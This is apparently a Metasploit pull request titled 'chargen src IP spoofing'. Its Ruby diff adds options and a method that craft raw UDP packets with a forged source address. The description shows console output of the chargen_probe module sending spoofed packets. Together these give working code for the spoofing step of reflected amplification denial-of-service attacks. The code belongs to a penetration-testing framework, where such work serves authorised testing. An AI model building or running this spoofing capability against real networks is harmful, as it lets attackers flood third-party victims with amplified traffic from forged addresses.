### PR TITLE
chargen src IP spoofing

### DIFF
--- a/lib/msf/core/auxiliary/drdos.rb
+++ b/lib/msf/core/auxiliary/drdos.rb
@@ -8,6 +8,15 @@ module Msf
 ###
 module Auxiliary::DRDoS
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
@@ -41,6 +50,10 @@ module Auxiliary::DRDoS
     end
 
     [ vulnerable, proofs.join(', ') ]
+  end
+
+  def spoofed?
+    !datastore['SRCIP'].nil?
   end
 
 end

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
     scanner_postscan(batch)
   end
 
+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
   # Send a packet to a given host and port
   def scanner_send(data, ip, port)
 


### PR DESCRIPTION
Adds the ability to do src IP spoofing using the chargen service. Example usage:

``` text
msf auxiliary(chargen_probe) > set RHOSTS 10.0.0.61
RHOSTS => 10.0.0.61
msf auxiliary(chargen_probe) > set SRCIP 10.0.0.60
SRCIP => 10.0.0.60
msf auxiliary(chargen_probe) > set NUM_REQUESTS 3
NUM_REQUESTS => 3
msf auxiliary(chargen_probe) > run

[*] Sending 3 packet(s) to 10.0.0.61 from 10.0.0.60
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
